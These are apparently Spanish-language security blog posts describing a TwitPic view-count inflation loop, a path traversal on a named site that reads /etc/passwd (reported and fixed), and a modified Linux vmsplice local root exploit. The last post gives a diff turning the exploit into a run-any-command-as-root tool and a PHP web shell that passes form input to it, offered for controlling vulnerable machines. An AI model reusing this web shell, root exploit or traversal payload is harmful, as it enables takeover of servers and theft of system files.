Aunque está falla no implica ningún riesgo de seguridad, yo lo considero un bug y se los reporté a los encargados de TwitPic, pero no lo han solucionado ni me han respuesto el correo.
Este bug lo podemos comprobar al hacer varias veces F5 (recargar la página) y vemos como las visitas aumentan.
El comando para aprovecharse de este bug:

while /bin/true; do wget -O /dev/null -o /dev/null; done

Demostración:

Busquemos una imágen cualquiera, nos fijamos en la cantidad de visitas y copiamos la URI:

Tiene 176 vistas y la uri es http://twitpic.com/mrsu

Ejecutamos el comando mágico:

[zerial@daila ~]$ while /bin/true; do wget http://twitpic.com/mrsu -O /dev/null -o /dev/null; done
(esperamos unos segundos … y cancelamos presioando control+c)
[zerial@daila ~]$

Volvemos a ver la imágen:

Y listo, tenemos más de dos mil vistas.

Compartir/Guardar

Como es de costumbre, me comuniqué con el encargado de este sitio web y le comenté el problema, él se mostró muy interesado y solucionó de inmediato el problema, su respuesta fue:

Ya hice el cambio que me recomendaste para permitir sólo descargas desde el directorio files. Te agradezco sinceramente el consejo que me diste, no sólo porque ha evitado un problema para la gente de olsc, sino también la gente de otros sitios que he hecho donde también he usado esta función.

La URL vulnerable era la siguiente es http://www.olsc.cl/download.php?f=../../../../fichero/a/obtener, la cual fue removida.

Compartir/Guardar

La forma de explotar este fallo era iniciar sesion con cualquier usuario y buscar algun documento, cuando acercabamos el mouse hacia el link podiamos ver:

Si modificabamos ese link, remplazando documento para descargar.pdf por alguna ruta a un archivo de sistema, podremos descargarlo. Por ejemplo

Con ../../../../ nos aseguramos retroceder lo suficiente para llegar a la raiz y con /etc/passwd le decimos al script download.php que nos entregue el fichero passwd, que guarda la informacion de usuarios de sistema. Obteniendo lo siguiente:

Dias despues de explotar y confirmar esta vulnerabilidad, me di el trabajo de comunicarles a los de soporte de ese sitio sobre este fallo obteniendo una respuesta en poco tiempo. Estaban muy agradecidos por haberles comunicado el problema. En unos minutos me agrego a gtalk/jabber el desarrollador del portal y me hizo unas preguntas, para saber como habia logrado explotar esa vulnerabilidad y en que consistia y, luego de haberle respondido algunas preguntas y haberlo ayudado, rapidamente solucionó el problema.

Las vulnerabilidades de tipo file/path disclosure son aquellas donde de alguna u otra forma podemos acceder a archivos del sistema que estan fuera del path de la web, como en este caso, por ejemplo si la web hubiese estado en /var/www/bibliodoc, mediante este bug pudimos acceder a un archivo ubicado en /etc/ que, claramente, esta fuera del directorio.

Compartir/Guardar

root-exploit.diff

1. 51a52
2. > char  *_cmd;
3. 55d55
4. < printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
5. 182,183d181
6. <
7. <       printf("[+] root\n");
8. 185c183,184
9. <       execl("/bin/bash", "bash", "-i", NULL);
10. —
11. >       system(_cmd);
12. >       //execl("/bin/bash", "bash", "-i", NULL);
13. 195a195
14. >       _cmd = argv[1];
15. 202,205d201
16. < printf("———————————–\n");
17. <       printf(" Linux vmsplice Local Root Exploit\n");
18. <       printf(" By qaaz\n");
19. <       printf("———————————–\n");
20. 221,223d216
21. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
22. <       printf("[+] page: 0x%lx\n", pages[0]);
23. <       printf("[+] page: 0x%lx\n", pages[1]);
24. 241,243d233
25. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
26. <       printf("[+] page: 0x%lx\n", pages[2]);
27. <       printf("[+] page: 0x%lx\n", pages[3]);
28. 258,259d247
29. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
30. <       printf("[+] page: 0x%lx\n", pages[4]);
31. 269d256
32. <       printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size)

La modificacion que hago es eliminar todos los printf para que el resultado sea mas limpio ademas, tambien modifico el codigo para que ejecute el comando que nosotros le digamos y luego vuelva a su estado normal.

Demostracion

username@machine:~$ ./root-exploit whoami
root
username@machine:~$

De esta manera podremos programar un sencillo script en php para manipular la maquina vulnerable como se nos de la gana.

1. < ?PHP
2. print "
3. <form action="?" method="post">
4. <input name="cmd" type="text" />
5. <input type="submit" value="eXec!" />
6.  
7. ";
8. if(isset($_POST[‘cmd’]))
9. {
10.    print "<textarea cols="30" rows="120">";
11.    print shell_exec("./root-exploit ".$_POST[‘cmd’]);
12.    print "</textarea>";
13. }
14. ?>

Descargas
Variacion del exploit
Exploit original 1
Exploit original 2

Compartir/Guardar